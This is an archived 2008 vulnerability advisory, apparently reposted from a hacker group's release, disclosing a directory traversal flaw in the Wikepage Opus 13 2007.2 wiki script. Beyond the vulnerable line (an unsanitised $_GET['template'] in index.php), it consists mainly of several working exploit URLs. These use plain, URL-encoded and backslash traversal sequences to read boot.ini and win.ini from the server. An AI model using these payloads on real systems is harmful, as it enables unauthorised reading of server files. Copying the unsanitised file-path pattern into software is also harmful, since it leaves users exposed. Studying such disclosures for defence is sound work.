Wikepage Opus 13 2007.2 Directory Traversal Vulnerbility

2008-04-08T00:00:00
ID SECURITYVULNS:DOC:19582
Type securityvulns
Reporter Securityvulns
Modified 2008-04-08T00:00:00

Description

         ##############################################################################
         #                                                                            #
         #  ...:::::Wikepage Opus 13 2007.2 Directory Traversal Vulnerbility ::::.... #         
         ##############################################################################

AUTHOR : Virangar Security Team (A.Nosrati )

Email : Virangar_nml@yahoo.com or 9120000000@yahoo.com or Virangar_SECRET@hotmail.com

ICQ: 445117030

Script : Wikepage Opus 13 2007.2

Type Of Bug : Directory Traversa

Virangar Security Team VIRANGAR UNDER GR0UND TEAM

Special tnx to:HadiHadi,black.shadowes,MR.hesy,IGI,Night_Fox,Kasra515,Gholonbeh_MS

& all Virangar Members .........................

Greetz:Ali007;Kouros_Virus2005 ........

Web Site : http://www.wikepage.org/ (Download http://sourceforge.net/project/downloading.php?groupname=wikepage&filename=wikepage2007_2.zip&use_mirror=puzzle)


vulnerability Path :

vuln code in [localhost]/wikepage/index.php Sample Of vulnerabil Line : $ templatefile=$_GET['template']; (Line 586) And More .....

Exploit : http://localhost/wikepage/index.php?wiki=template=../../../../../../../../boot.ini
or http://localhost/wikepage/index.php?wiki=Admin=../../../../../../../../boot.ini or http://localhost/wikepage/index.php?wiki=Recent_changes=../../../../../../../../boot.ini or http://localhost/wikepage/index.php?wiki=Recent_changes=# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c/boot.ini or http://localhost/wikepage/index.php?wiki=Recent_changes=..\..\..\..\..\..\..\..\WINDOWS\win.ini and more ........

Good Luck Virangar.org ( Coming Soooooooooooooooooooooon::::::::::::::::::) Are U Ready hummmmmmmmmmmm???!!!!!!!!!!